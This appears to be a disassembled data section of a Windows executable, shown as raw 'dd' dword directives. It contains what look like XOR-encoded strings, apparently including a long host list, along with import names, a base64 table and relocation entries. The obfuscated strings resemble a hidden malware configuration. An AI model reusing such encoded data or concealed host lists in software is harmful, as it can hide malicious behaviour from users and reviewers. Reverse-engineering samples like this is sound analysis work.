dd 0A4B7A3D9h, 0A8DFA0A8h, 0DBh, 400h, 4B002500h, 48004400h
dd 4000h, 500h, 6007000h, 1C001100h, 15000500h, 1000000h
dd 0F9DA00h, 0B1920001h, 23000100h, 70000h, 50504C24h
dd 0B0B1E54h, 47000100h, 70064h, 0B8B8A4CCh, 0E3E3F6BCh
dd 0C4042B00h, 0A7A1ACA7h, 0B4AAA1ACh, 0B7B7A1B6h, 0A2AAADEAh
dd 0ABA3E7ABh, 0ABB4A0A8h, 0A7EAA8A8h, 0ADE7A9ABh, 0ABA3B0AAh
dd 0A7EAA0A8h, 0B3E7A9ABh, 0A7EAB3B3h, 0B6EAB6A6h, 0B3B3E7B1h
dd 0ABB7EAB3h, 0EAB7AFA7h, 0B7E7A7A5h, 0A9B6ABB0h, 0EABDA5B4h
dd 0E7A9ABA7h, 0B0B1B6A7h, 0AAEAB4ABh, 0A1AAE7B1h, 0A3A1EAB3h
dd 0ABA7EAA3h, 0B3B3E7A9h, 0ABB4EAB3h, 0B7ADBEAAh, 0B7A9A5A7h
dd 0A9ABA7EAh, 0A8A1B3E7h, 0A1A9ABA7h, 0A9B7EAF7h, 0EAA1A8ADh
dd 0B1EAABA7h, 0A8ABE7AFh, 0AAEAF6A6h, 0ABADB0A5h, 0EAB0A1AAh
dd 0E7A9ABA7h, 0EAB3B3B3h, 0AAADA6A6h, 0E7B1B6EAh, 0B0B7A5A9h
dd 0BCE9B6A1h, 0A9ABA7EAh, 0B3B3B3E7h, 0AAABB4EAh, 0A7B7ADBEh
dd 0EAB7A9A5h, 0E7A9ABA7h, 0EAB3B3B3h, 0AFAAA5A6h, 0AAA5A6E9h
dd 0E9A1B1B5h, 0A5AAA5A7h, 0A7EAA5A0h, 0B3B3E7A5h, 0ABB4EAB3h
dd 0B7ADBEAAh, 0B7A9A5A7h, 0A9ABA7EAh, 0B3B3B3E7h, 0ABA9A6EAh
dd 0A9ABA7EAh, 0BDA5B4E7h, 0EAA8A5B4h, 0E7A9ABA7h, 0BDA5A6A1h
dd 0A9ABA7EAh, 0B3B3B3E7h, 0AAA5A6EAh, 0A9A2ABAFh, 0B6B1A0A5h
dd 0ABA7EAA5h, 0B3B3E7A9h, 0ADA7EAB3h, 0A7EAA7A6h, 0B3E7A9ABh
dd 0B2EAB3B3h, 0B6EAA6B0h, 0B3B3E7B1h, 0B3A7EAB3h, 0AFAAA5A6h
dd 0A9ABA7EAh, 0A8ABA3E7h, 0A8ABB4A0h, 0ABA7EAA8h, 0B3B3E7A9h
dd 0ABB4EAB3h, 0B7ADBEAAh, 0B7A9A5A7h, 0A9ABA7EAh, 0B3B3B3E7h
dd 0A6A9A9EAh, 0EAAFAAA5h, 0B3E7B1B6h, 0B1EAB3B3h, 0B7A5ADAAh
dd 0A9B1B6B0h, 0E7B1B6EAh, 0A0A8ABA3h, 0A8A8ABB4h, 0A9ABA7EAh
dd 0B3B3B3E7h, 0AAABB4EAh, 0A7B7ADBEh, 0EAB7A9A5h, 0E7A9ABA7h
dd 0EAB3B3B3h, 0A8B6ABB3h, 0AAA5A6A0h, 0B6ABEAAFh, 0B3B3E7A3h
dd 0A5A7EAB3h, 0A0ADA0AAh, 0B2A1B0A5h, 0A2ADB6A1h, 0EAB6A1ADh
dd 0E7A9ABA7h, 0EAB3B3B3h, 0BEAAABB4h, 0A5A7B7ADh, 0A7EAB7A9h
dd 0B3E7A9ABh, 0A6EAB3B3h, 0ABAFAAA5h, 0A0AAADA2h, 0A7EAA5ADh
dd 0B3E7A9ABh, 0ADEAB3B3h, 0AAA5A6A7h, 0B1B6EAAFh, 0AAA5A6E7h
dd 0A3AAADAFh, 0A8A5ACEAh, 0BCA5A2ADh, 0A8AAABE9h, 0EAA1AAADh
dd 0B1EAABA7h, 0B3B3E7AFh, 0A1B2EAB3h, 0B6ABA0AAh, 0A9A5AAB7h
dd 0B7B3EAA1h, 0B3B3B3E7h, 0A6A9AFEAh, 0E7B1B6EAh, 0EAB3B3B3h
dd 0A9B0A1AAh, 0B7ADA3A5h, 0EAB6A1B0h, 0E7A9ABA7h, 0AFB2A5AFh
dd 0A1A7BEA5h, 0B6A1B0AAh, 0A9ABA7EAh, 0B3B3B3E7h, 0AAA1B2EAh
dd 0B7B6ABA0h, 0A1A9A5AAh, 0E7B7B3EAh, 0AAABBDA9h, 0A1AAADA8h
dd 0ABA7A7A5h, 0B7B0AAB1h, 0A6A5EAF6h, 0AABDA1A6h, 0ABADB0A5h
dd 0EAA8A5AAh, 0B1EAABA7h, 0AAABE7AFh, 0A1AAADA8h, 0B7B1A6E9h
dd 0B7A1AAADh, 0A8A8EAB7h, 0B7A0BDABh, 0EAA6B7B0h, 0B1EAABA7h
dd 0B3B3E7AFh, 0A8A5EAB3h, 0A5ACA5A8h, 0A6A0A5A6h, 0EAAFAAA5h
dd 0E7A9ABA7h, 0EAB3B3B3h, 0EAA7A6B6h, 0E7A9ABA7h, 0EAB3B3B3h
dd 0BEAAABB4h, 0A5A7B7ADh, 0A7EAB7A9h, 0B3E7A9ABh, 0EAF5B3B3h
dd 0A7A6B7ACh, 0E7A5A7EAh, 0B6A6A3AFh, 0BCA5A8A1h, 0A6B1A8A7h
dd 0E7B1B6EAh, 0A6A9A5BDh, 0ADA6EAABh, 0ADAFE7BEh, 0E9B7ABA0h
dd 0AFAAA5A6h, 0E7B1B6EAh, 0EAB3B3B3h, 0A0A7A6A8h, 0A7A1B6ADh
dd 0A5A8EAB0h, 0AAA1B6B1h, 0AAA5ADB0h, 0AFAAA5A6h, 0E7A5A7EAh
dd 0A7B6A5A6h, 0B7BDA5A8h, 0A9ABA7EAh, 0B0ABB0E7h, 0BDA8A8A5h
dd 0A1A1B6A2h, 0AFAAA5A6h, 0EAA3AAADh, 0E7A9ABA7h, 0EAB3B3B3h
dd 0EAA7A6AAh, 0F1E7A5A7h, 0AAA5A6F7h, 0ABA7EAAFh, 0B3B3E7A9h
dd 0A1B2EAB3h, 0B6ABA0AAh, 0A9A5AAB7h, 0B7B3EAA1h, 0B3B3B3E7h
dd 0A6F6A6EAh, 0B1B6B0E9h, 0A7EAB0B7h, 0B3E7A9ABh, 0B2EAB3B3h
dd 0ABA0AAA1h, 0A5AAB7B6h, 0B3EAA1A9h, 0B4ABE7B7h, 0A5A6AAA1h
dd 0A7EAAFAAh, 0B0E7A9ABh, 0AAE9B0A5h, 0A6B0A2A1h, 0EAAFAAA5h
dd 0B7E7B1B6h, 0A5A8A7A1h, 0B1B6EAA6h, 0A7A1B7E7h, 0B0ADB6B1h
dd 0A6A5A8BDh, 0E7B1B6EAh, 0ACB0A1A2h, 0EAA0B6A5h, 0E7BEADA6h
dd 0AAABB6A3h, 0A5A8B4BCh, 0B7B0A1AAh, 0E7B1B6EAh, 0A0AAA1B2h
dd 0AAB7B6ABh, 0EAA1A9A5h, 0E7B7B3h, 0CDBE000Dh, 0DBCACDC7h
dd 0D1CCCED3h, 0DBD2D7D8h, 6A000600h, 31C180Fh, 1000F09h
dd 0FEDA00h, 0CAEA0008h, 0BCB8AFB9h, 0AFA9A3h, 3B680006h
dd 2D3C3B31h, 50025h, 898CC6E8h, 900899Ch, 5F7D2D00h, 4E584942h
dd 496459h, 0E5D002Ch, 0A091B12h, 1180F1Ch, 2F3E3410h
dd 3B322E32h, 340A0129h, 2A323933h, 9137D2Eh, 2F281E01h
dd 2933382Fh, 2E2F380Bh, 333234h, 0E6B60009h, 0C3D2D9C4h
dd 0D2FFC2D5h, 95002900h, 0C1D3DAC6h, 0D0C7D4C2h, 0F6FCD8C9h
dd 0FAE6FAE7h, 0C2C9E1F3h, 0FAF1FBFCh, 0D6C9E6E2h, 0F0E7E7E0h
dd 0F0C3E1FBh, 0FAFCE6E7h, 100FBh, 400EEC0h, 9B93BE00h
dd 30090E6h, 6A335000h, 8000Ch, 69326247h, 62693262h, 20032h
dd 0C3D997h, 0F5CC0002h, 94h, 400B0h, 989DD7F9h, 4008Dh
dd 0E1E9FCD9h, 0F0081h, 446B3D18h, 3D747E7Ch, 2A2B626Dh
dd 74747C36h, 26000F00h, 4D7A5503h, 4A530340h, 814155Ch
dd 4A4A42h, 6144000Bh, 37611837h, 2A6A3161h, 4003728h
dd 91D7F200h, 100AEC8h, 0F4D400h, 0F00000h, 0CD980013h
dd 0F4FAF9F6h, 0F7ECB8FDh, 0ECEDF9B8h, 0F1EAF7F0h, 3500FDE2h
dd 0D7ECB900h, 0DCD5DBD8h, 99D6CD99h, 0D1CDCCD8h, 0C3D0CBD6h
dd 999499DCh, 0F6FAF7F0h, 0FAFCEBEBh, 0F0E999EDh, 0E99997F7h
dd 0CAD8DCD5h, 0DA9995DCh, 0DCCBCBD6h, 97CDDAh, 0EFC20001h
dd 0F7001E00h, 96929BA7h, 0D7DB9284h, 929B9284h, 0B2D78394h
dd 859E878Fh, 989E8396h, 92AED799h, 1008596h, 7A5A00h
dd 0C5C001Fh, 2F3D3930h, 2F7C7039h, 3F393039h, 24197C28h
dd 3D2E352Ch, 32333528h, 3233117Ch, 2003428h, 67674700h
dd 6A000100h, 120045h, 4D5D432Eh, 715D425Ah, 5A4F5A5Dh
dd 4F4C5D5Bh, 1C1D5Ch, 4410000Eh, 79477271h, 677F747Eh
dd 63717C53h, 50063h, 0E1CE98BDh, 500CE98h, 0B1E7C200h
dd 0B1E79Eh, 0F7D20004h, 0F88EA1h, 40650005h, 39164016h
dd 92000500h, 0E1B7E1B7h, 300CEh, 376E381Dh, 0F5000400h
dd 0A9CF96D0h, 3000C00h, 73706A47h, 53776644h, 6E627162h
dd 48000B00h, 213A291Eh, 13C2629h, 3C2126h, 491F000Ch
dd 7E766D7Eh, 735C6B71h, 6D7E7Ah, 0C99A000Dh, 0E8DCE9E3h
dd 0EEC9FFFFh, 0FDF4F3E8h, 8D000E00h, 0CCFEF4DEh, 0EEE2E1E1h
dd 0E4FFF9DEh, 0C00EAE3h, 696A0500h, 71706460h, 612B3736h
dd 0C006969h, 0A5A6C900h, 0BDBCA8ACh, 0ADE7FBFAh, 1600A5A5h
dd 634C0F00h, 2F646C66h, 6A6C6140h, 2F605B2Fh, 7B61604Ch
dd 6A7A6166h
dd 26000600h, 72727364h, 1E006869h, 5185D00h, 1C0F140Dh
dd 13121409h, 91C197Dh, 57575718h, 7D10091Ch, 7D13140Dh
dd 1819121Eh, 39000600h, 6D786D6Ah, 7A70h, 4001500h, 6E6F2A00h
dd 6007E63h, 3B390B00h, 7E39252Eh, 0C1000400h, 0B4F3EFE4h
dd 6D000000h, 0C1000800h, 838C8E82h, 998E838Eh, 0C8000000h
dd 0AD000800h, 0EFE0E2EEh, 0F5E2EFE2h, 0F7000600h, 0A3B6A3A4h
dd 6E00B4BEh, 13A6F00h, 0A030D0Eh, 4F001B4Fh, 71B1A0Eh
dd 15061D00h, 4A65410Ah, 1D1F4F1Ch, 1C0A0C00h, 801061Ch
dd 10A0C4Fh, 4F1D0A1Bh, 1A4F1C06h, 30D0E01h, 1B4F0Ah, 1B1A0E4Fh
dd 61D0007h, 164F0A15h, 4F1D1A00h, 0B1D0E0Ch, 411C4A4Fh
dd 40E2265h, 0C4F0Ah, 0C0A1D1Dh, 100061Bh, 10E4F1Ch, 1D1B4F0Bh
dd 80E4F16h, 4101060Eh, 58000A00h, 2C2B3915h, 391B2A3Dh
dd 4003C2Ah, 0D7C89E00h, 100DFCDh, 644400h, 76250006h
dd 6C716471h, 66h, 60080h, 0E6F3F4A7h, 0E4EEF3h, 0F4FE0015h
dd 0AEDEDEDEh, 0BBBDB1ACh, 0B0B7ADADh, 0BFB8DEB9h, 0BABBB2B7h
dd 0E8000600h, 0BCA9BCBBh, 600ABA1h, 50503B00h, 434D164Ah
dd 18000800h, 7468605Dh, 6A7D6A77h, 0B2000900h, 0FDD1DDF6h
dd 0D1D7D8D0h, 0E00C6h, 71724713h, 777D7A44h, 7F50647Ch
dd 606072h, 900h, 0B006900h, 0F000C00h, 1B000600h, 2C000C00h
dd 0D000700h, 5F000000h, 43162A00h, 5D0A4D47h, 425E4E43h
dd 420A1A17h, 424D434Fh, 0A1A175Eh, 4E584548h, 1A17584Fh
dd 4958590Ah, 5E5E4217h, 505105Ah, 4215590Fh, 0C590F17h
dd 5F0F1743h, 450C590Fh, 0C5F0F17h, 490F174Ch, 1743590Ch
dd 590C590Fh, 5F0F1745h, 17465E0Ch, 5C0C5F0Fh, 0C5F0F17h
dd 590F174Eh, 2C0014h, 7A7E2B17h, 7E603770h, 2A7F6373h
dd 727F3727h, 637F707Eh, 7537272Ah, 72736578h, 37272A65h
dd 2A746564h, 28386432h, 74322A71h, 70029h, 89D58BB7h
dd 89D5988Bh, 0A5000400h, 0F99FC680h, 0F3000400h, 0ABC1DDD6h
dd 74000100h, 20051h, 92D4F1h, 6A390010h, 507F4D5Ch, 5C6A5C55h
dd 504B4C5Ah, 78404Dh, 0F480017h, 211B3C2Dh, 2A3D1B2Ch
dd 203C3D09h, 3C213A27h, 3D270B31h, 12003C26h, 0F5D79000h
dd 0F4F9C3E4h, 0D1F2E5C3h, 0FFF8E4E5h, 0E9E4F9E2h, 8A001900h
dd 0D9FEEFCDh, 0EEC3EEE3h, 0E3FEE4EFh, 0F8EFE3ECh, 0E2FEFFCBh
dd 0FEE3F8E5h, 1A00F3h, 0F1E287Bh, 0E181E28h, 20F1209h
dd 18081E3Fh, 0F0B1209h, 0C340914h, 91E15h, 0A5F60019h
dd 93A58293h, 9F848395h, 93B28F82h, 9F849585h, 84998286h
dd 9A9597B2h, 44001C00h, 302D2A0Dh, 2D28252Dh, 2117213Eh
dd 2D363127h, 21003D30h, 2D362737h, 362B3034h, 2001500h
dd 77686643h, 6D567671h, 526C6769h, 6B746B70h, 6765676Eh
dd 130071h, 32230146h, 232D2912h, 20280F28h, 272B3429h
dd 28292F32h, 11001500h, 7A7E7E5Dh, 63416164h, 7D786778h
dd 47747674h, 74647D70h, 100050h, 0E9FCC38Ch, 0E3FEDCE2h
dd 0FFFFE9EFh, 0E9E7E3D8h, 0C00E2h, 0E1F3D7Ah, 81F092Fh
dd 1F171B34h, 0B003Bh, 64665103h, 706C6F40h, 7A664866h
dd 7F001000h, 2E181A2Dh, 60D1A0Ah, 0A131E29h, 3E073A1Ah
dd 0EB000D00h, 0A48C8EB9h, 0A0858E9Bh, 93AE928Eh, 0C00AAh
dd 4C5E5B3Ah, 9534A5Bh, 565E1408h, 0C0056h, 5E4C4928h
dd 1B415849h, 444C061Ah, 10044h, 1200376Bh, 0D3F8BD00h
dd 0D8F9D0C8h, 0D2C9D6CEh, 0D3D4EACDh, 0CECAD2D9h, 8D000D00h
dd 0E9E3E4CBh, 0E9E3E4DAh, 0F5C8FAE2h, 1000CCh, 0C1F396Dh
dd 0C011E03h, 8200819h, 0A0C1E1Eh, 0A0008h, 67605B08h
dd 66615F7Fh, 7F676Ch, 1645000Eh, 2C123120h, 322A212Bh
dd 313D2011h, 0E0004h, 44556330h, 545E5967h, 5F7C475Fh
dd 71575Eh, 0F2A10008h, 0C8F5D5C4h, 0D3C4CCh, 3B680008h
dd 72E1C0Dh, 1B1D0Bh, 0EAB9000Ch, 0F4DDD7DCh, 0D8CACADCh
dd 0F8DCDEh, 0B1E3000Eh, 908A8486h, 0A0918697h, 9090828Fh
dd 0A00A2h, 0D0C9EBA6h, 0C8CFF1C3h, 0D1C9C2h, 8EC3000Bh
dd 0A2B0B0A6h, 0AC81A6A4h, 90082BBh, 2C0F4300h, 200A2722h
dd 22D2Ch, 0FBB7000Bh, 0F4D3D6D8h, 0D8C4C5C2h, 0E00F6C5h
dd 0F2D09700h, 0F9FEC0E3h, 0C3E0F8F3h, 0D6E3EFF2h, 0BF000D00h
dd 0E8CBDAF8h, 0D0DBD1D6h, 0DCDAEDC8h, 0E00CBh, 78694B0Ch
dd 6862655Bh, 63407B63h, 4D6B62h, 0BDFA0009h, 93AD8E9Fh
dd 8D959E94h, 13000B00h, 5E677654h, 72606076h, 527674h
dd 0F8BF0013h, 0D0F9CBDAh, 0CDD8DACDh, 0DBD1CAD0h, 0DBD1D6E8h
dd 0D00C8D0h, 1D3F7800h, 19143B0Ch, 19360B0Bh, 391D15h
dd 0E2A60010h, 0C7D6D5CFh, 0EBCEC5D2h, 0C7D5D5C3h, 0E7C3C1h
dd 0EFAB000Dh, 0D9DFD8CEh, 0C2FCD2C4h, 0DCC4CFC5h, 0E0000E00h
dd 0B78685A4h, 8F848E89h, 8F92B097h, 0F00A183h, 6D5C1F00h
dd 7A6B7E7Ah, 7B717648h, 675A6870h, 0F005Eh, 45486A29h
dd 47407E45h, 795E464Dh, 684A465Bh, 0A2000A00h, 0D0C7D1D7h
dd 0C68C9091h, 0A00CECEh, 42443100h, 3024354h, 5D5D551Fh
dd 0A1000E00h, 0F2D5C4E6h, 0CAC2CED5h, 0C4CBC3EEh, 0B00D5C2h
dd 0AC9DDE00h, 0BBAABFBBh, 0AAB0B198h, 9009Fh, 888586E1h
dd 85CFD3D2h, 9008D8Dh, 1C1F7800h, 564A4B11h, 14141Ch
dd 1B3E0005h, 4D1B624Dh, 0AA000500h, 8FF6D98Fh, 400D9h
dd 1E316742h, 110068h, 0F2E8CF86h, 0E3E8F4E3h, 0FEC3A6F2h
dd 0F4E9EAF6h, 600F4E3h, 8080EB00h, 939DC69Ah, 0A1000600h
dd 8CD0CACAh, 600D9D7h, 0C0C6700h, 1F114A16h, 66000600h
dd 4B170D0Dh, 8001E10h, 0B6E0C500h, 0BDB1A89Ah, 600B0E0h
dd 0A7A7CC00h, 0B4BAE1BDh, 67000700h, 0A381442h, 561F13h
dd 44434241h, 48474645h, 4C4B4A49h, 504F4E4Dh, 54535251h
dd 58575655h, 62615A59h, 66656463h, 6A696867h, 6E6D6C6Bh
dd 7271706Fh, 76757473h, 7A797877h, 33323130h, 37363534h
dd 2F2B3938h, 2F2F3A00h, 0A0597200h, 0CFF6A89Bh, 42A411h
dd 8F0AC9A0h, 4106E039h, 0D0399AFEh, 8CA411h, 8F0AC9A0h
dd 0A715A039h, 0D0658734h, 4A9211h, 0ACC7AF20h, 50F25B4Dh
dd 0CF98B530h, 82BB11h, 0CEBD00AAh, 96B2840Bh, 1ABAB4B1h
dd 9CB610h, 1D3400AAh, 2040007h, 0
dd 0C000h, 0
dd 2C442546h, 0D026CB33h, 83B411h, 1D94FC0h, 50F21F19h
dd 0CF98B530h, 82BB11h, 0CEBD00AAh, 50F1FF0Bh, 0CF98B530h
dd 82BB11h, 0CEBD00AAh, 50F1F70Bh, 0CF98B530h, 82BB11h
dd 0CEBD00AAh, 50F2400Bh, 0CF98B530h, 82BB11h, 0CEBD00AAh
dd 2C44270Bh, 0D026CB33h, 83B411h, 1D94FC0h, 0F8098119h
dd 1ABF327Bh, 0BB8B10h, 0C3000AAh, 0CB6900ABh, 0CF4D9585h
dd 0C9611h, 0EEF4C780h, 85h, 0
dd 0C000h, 0
dd 0C166146h, 0D0CDAFD3h, 3E8A11h, 0E2C94FC0h, 6Eh, 46h dup(0)
dd 1607000h, 2 dup(0)
dd 1618400h, 160AC00h, 1608400h, 2 dup(0)
dd 161A000h, 160C000h, 12h dup(0)
dd 160E800h, 160F800h, 1611400h, 2 dup(0)
dd 1612000h, 1612C00h, 1614000h, 1614C00h, 1615800h, 1616400h
dd 1616C00h, 1617800h, 2 dup(0)
dd 160E800h, 160F800h, 1611400h, 2 dup(0)
dd 1612000h, 1612C00h, 1614000h, 1614C00h, 1615800h, 1616400h
dd 1616C00h, 1617800h, 2 dup(0)
dd 45009B00h, 50746978h, 65636F72h, 7373h, 47012400h, 6E457465h
dd 6F726976h, 6E656D6Eh, 72745374h, 73676E69h, 41h, 52027800h
dd 6E556C74h, 646E6977h, 5F008000h, 706F6466h, 6E65h, 5F014F00h
dd 6E65706Fh, 66736F5Fh, 646E6168h, 656Ch, 66020D00h, 736F6C63h
dd 65h, 5F003900h, 69786563h, 74h, 6D024E00h, 6F6C6C61h
dd 63h, 72026000h, 65736961h, 73026700h, 75627465h, 66h
dd 73027500h, 70637274h, 79h, 52454B00h, 334C454Eh, 6C642E32h
dd 6Ch, 1600000h, 2 dup(1600010h), 54524310h, 2E4C4C44h
dd 4C4C44h, 1601400h, 7 dup(1601410h), 10h, 0Dh dup(0)
dd 2000h, 0
dd 2000h, 100000h, 0CC0000h, 0D00000h, 10A0000h, 78h dup(0)
dd 100000h, 1D800h, 8C303100h, 0FD30F330h, 13310530h, 21311931h
dd 0B6312731h, 0FC31EF31h, 0E320131h, 23321332h, 3E322932h
dd 3132B432h, 51333833h, 71335833h, 0F0337833h, 633FC33h
dd 21341334h, 3B342B34h, 65344B34h, 7D347634h, 98348D34h
dd 0C534B134h, 0DA34D034h, 0E834DF34h, 0F834F034h, 1034FF34h
dd 30352035h, 50353F35h, 6B355B35h, 80357035h, 9C359235h
dd 0AD35A235h, 0CF35B735h, 0DF35D535h, 0FC35E435h, 1F360735h
dd 2E362736h, 3E363936h, 52364C36h, 62365D36h, 74366836h
dd 95367B36h, 0A4369F36h, 0B536AA36h, 0F436C536h, 536F936h
dd 2B371F37h, 78375637h, 8E377E37h, 0B137A237h, 0D037C337h
dd 0E937D637h, 237F537h, 1B381438h, 36382A38h, 48383F38h
dd 5E385238h, 69386338h, 0C938B338h, 0EB38E038h, 1038F138h
dd 23391D39h, 61395A39h, 76396D39h, 0B039A339h, 0D039C739h
dd 0FB39E639h, 1F3A0A39h, 483A373Ah, 7B3A5E3Ah, 0D53A983Ah
dd 63AE93Ah, 553B4F3Bh, 6F3B653Bh, 823B743Bh, 9D3B8C3Bh
dd 0B23BA73Bh, 0CA3BBB3Bh, 0DF3BD43Bh, 0F43BEB3Bh, 0C3C033Bh
dd 1E3C153Ch, 363C283Ch, 4A3C453Ch, 963C8E3Ch, 0A23C9C3Ch
dd 0CF3CAC3Ch, 0E13CDB3Ch, 173CE63Ch, 263D1D3Dh, 3B3D313Dh
dd 4C3D463Dh, 653D5E3Dh, 793D713Dh, 883D7F3Dh, 9C3D903Dh
dd 0AE3DA93Dh, 0C43DB73Dh, 0CE3DC93Dh, 0E03DDA3Dh, 0EA3DE53Dh
dd 0FF3DF93Dh, 1B3E043Dh, 413E273Eh, 573E513Eh, 8D3E7F3Eh
dd 0AB3E943Eh, 0D03EC23Eh, 0F73EE23Eh, 643F083Eh, 923F833Fh
dd 0A33F9B3Fh, 0B53FB03Fh, 0CB3FBE3Fh, 0D53FD03Fh, 0E73FE13Fh
dd 0F13FEC3Fh, 3FFD3Fh, 200000h, 28C00h, 8300300h, 19300D30h
dd 24301F30h, 35302930h, 40303B30h, 51304530h, 5C305730h
dd 6D306130h, 78307330h, 89307D30h, 94308F30h, 0A5309930h
dd 0B030AB30h, 0C130B530h, 0CC30C730h, 0DD30D130h, 0E830E330h
dd 0F930ED30h, 430FF30h, 15310931h, 20311B31h, 31312531h
dd 3C313731h, 4D314131h, 58315331h, 69315D31h, 74316F31h
dd 85317931h, 90318B31h, 0A1319531h, 0AC31A731h, 0BD31B131h
dd 0C831C331h, 0D931CD31h, 0E431DF31h, 0F531E931h, 31FB31h
dd 11320532h, 1C321732h, 2D322132h, 38323332h, 49323D32h
dd 54324F32h, 65325932h, 70326B32h, 81327532h, 8C328732h
dd 0A0329132h, 0AB32A632h, 0E632DA32h, 0F832F032h, 2D332432h
dd 3A333433h, 5B333F33h, 6D336433h, 92337633h, 0A9339833h
dd 0C733B433h, 0F033E333h, 0FE33F533h, 10340B33h, 21341534h
dd 2C342734h, 3D343134h, 48344334h, 59344D34h, 64345F34h
dd 75346934h, 80347B34h, 91348534h, 9C349734h, 0AD34A134h
dd 0B834B334h, 0C934BD34h, 0D434CF34h, 0E534D934h, 0F034EB34h
dd 134F534h, 0C350735h, 1D351135h, 28352335h, 39352D35h
dd 44353F35h, 55354935h, 60355B35h, 71356535h, 7C357735h
dd 8D358135h, 98359335h, 0AC359D35h, 0B735B235h, 0D135CA35h
dd 0F135EA35h, 11360A35h, 78365B36h, 97368D36h, 0A936A436h
dd 0CC36BE36h, 0F736F036h, 1F371436h, 50374A37h, 80377B37h
dd 0BA37A837h, 0D537C037h, 1237FD37h, 3E383838h, 82385938h
dd 0A5388838h, 0C038B038h, 0D138CC38h, 0F438D738h, 17390538h
dd 38392E39h, 6B395139h, 7C397639h, 92398D39h, 0A0399739h
dd 0AD39A639h, 0CA39B439h, 0DE39D739h, 239EE39h, 383A083Ah
dd 593A453Ah, 7A3A6D3Ah, 0A03A8C3Ah, 0B63AA63Ah, 123B003Ah
dd 3A3B313Bh, 573B4B3Bh, 6E3B633Bh, 923B763Bh, 0B53BAF3Bh
dd 0D53BCE3Bh, 143BED3Bh, 273C1B3Ch, 5D3C513Ch, 813C733Ch
dd 0A03C943Ch, 0C63CA63Ch, 0F83CEB3Ch, 1B3D0E3Ch, 523D343Dh
dd 783D5D3Dh, 933D8C3Dh, 0AF3DA93Dh, 0C03DBB3Dh, 0E13DCF3Dh
dd 123E063Dh, 6C3E5F3Eh, 9F3E7D3Eh, 0B53EAB3Eh, 0A3EC03Eh
dd 213F103Fh, 3B3F273Fh, 553F413Fh, 713F5B3Fh, 8C3F853Fh
dd 0A83FA23Fh, 0CC3FBA3Fh, 0E43FDE3Fh, 3FF63Fh, 300000h
dd 23000h, 11300800h, 37302530h, 52304030h, 6F305930h
dd 8C307630h, 0B3309230h, 0D830D230h, 0EE30E730h, 530FE30h
dd 39312031h, 4A313F31h, 5B315431h, 70316831h, 91318B31h
dd 0B9319D31h, 0D731BF31h, 0F131E731h, 13320A31h, 25321C32h
dd 52324D32h, 7E326632h, 0C3329A32h, 0DF32D932h, 0FA32F232h
dd 3D330532h, 4D334333h, 81336933h, 99338733h, 0C633A833h
dd 0D933D233h, 433F433h, 3F341434h, 5C344634h, 7F347934h
dd 94348934h, 0CF34A434h, 0EF34D534h, 134F534h, 16350835h
dd 39351F35h, 49353F35h, 6B356035h, 84357635h, 93358D35h
dd 0A2359D35h, 0C335AC35h, 0D835C835h, 0FC35F635h, 10360835h
dd 33362236h, 43363936h, 60364936h, 73366736h, 90368B36h
dd 0B9369F36h, 0F236D136h, 2236F736h, 39372937h, 5E374137h
dd 6E376437h, 8D378737h, 9C379637h, 0BB37A937h, 0CA37C137h
dd 0DB37D037h, 0F037E637h, 0C380737h, 47381C38h, 59384D38h
dd 6C386138h, 94387738h, 0B6389E38h, 0CB38BB38h, 0FF38F938h
dd 13390D38h, 2B391F39h, 4E393439h, 70395839h, 89397539h
dd 0B039A439h, 0D339CD39h, 0EA39D839h, 0D39FE39h, 333A143Ah
dd 4E3A393Ah, 653A543Ah, 0A03A753Ah, 0B13AA73Ah, 0C23ABC3Ah
dd 0EF3ACD3Ah, 0E3B073Ah, 363B153Bh, 413B3C3Bh, 7C3B513Bh
dd 8B3B823Bh, 0A23B983Bh, 0CC3BC23Bh, 0E83BE33Bh, 263BF83Bh
dd 373C2D3Ch, 4D3C443Ch, 663C593Ch, 893C823Ch, 0AD3C953Ch
dd 0D13CCB3Ch, 0F33CED3Ch, 53D003Ch, 213D1B3Dh, 433D3D3Dh
dd 553D503Dh, 713D6B3Dh, 933D8D3Dh, 0A53DA03Dh, 0C13DBB3Dh
dd 0E33DDD3Dh, 0F53DF03Dh, 113E0B3Dh, 2B3E253Eh, 433E363Eh
dd 513E483Eh, 633E5E3Eh, 743E683Eh, 7F3E7A3Eh, 903E843Eh
dd 9B3E963Eh, 0AC3EA03Eh, 0B73EB23Eh, 0C83EBC3Eh, 0D33ECE3Eh
dd 0E73ED83Eh, 0F23EED3Eh, 123F0A3Eh, 2E3F1B3Fh, 4B3F453Fh
dd 5F3F583Fh, 893F653Fh, 0BF3F9A3Fh, 0FD3FC63Fh, 40003Fh
dd 1B000h, 46304000h, 71305A30h, 0BB309630h, 1F311830h
dd 89318231h, 0A831A231h, 0BB31B231h, 0C631C031h, 0D531D031h
dd 0F931E331h, 13320931h, 2C321E32h, 55324032h, 7E325B32h
dd 0AA329032h, 0D632BC32h, 0EE32DF32h, 35331132h, 63334733h
dd 7C336A33h, 0A8339633h, 0DA33D333h, 0FF33E033h, 3F341A33h
dd 58345134h, 70346034h, 0BD348B34h, 0DB34C534h, 0FE34F234h
dd 21351034h, 38353235h, 6B354F35h, 7E357835h, 0BA35B535h
dd 0C635C035h, 0FB35E135h, 25360935h, 3E363236h, 60365336h
dd 78366C36h, 9B368C36h, 0EB36AB36h, 45370836h, 76375937h
dd 0D037BC37h, 0F037DE37h, 0C380737h, 22381B38h, 3D383738h
dd 70384C38h, 82387938h, 0A8388D38h, 0BE38AE38h, 0D238CB38h
dd 2738E138h, 54393E39h, 73395A39h, 8F398939h, 0A3399A39h
dd 0CB39B239h, 0E239D639h, 133A0D39h, 1E3A183Ah, 313A2B3Ah
dd 553A373Ah, 7E3A783Ah, 943A853Ah, 0A93A9B3Ah, 0BC3AB53Ah
dd 0E13ACD3Ah, 0F13AE73Ah, 183B043Ah, 413B3B3Bh, 4D3B463Bh
dd 693B5D3Bh, 853B763Bh, 9F3B993Bh, 0BC3BA93Bh, 0F33BD03Bh
dd 3BF93Bh, 153C063Ch, 443C343Ch, 993C4A3Ch, 133C9F3Ch
dd 503D193Dh, 623D5B3Dh, 773D673Dh, 883D823Dh, 0A13D9C3Dh
dd 0C63DC03Dh, 0E03DDA3Dh, 0FD3DEA3Dh, 253E113Dh, 383E2B3Eh
dd 573E513Eh, 723E6B3Eh, 0A63E8B3Eh, 0C23EAC3Eh, 0E33EDD3Eh
dd 113EF63Eh, 2A3F173Fh, 4B3F453Fh, 923F533Fh, 0C03FAA3Fh
dd 0DE3FC63Fh, 3FF73Fh, 500000h, 21C00h, 2D301000h, 53303A30h
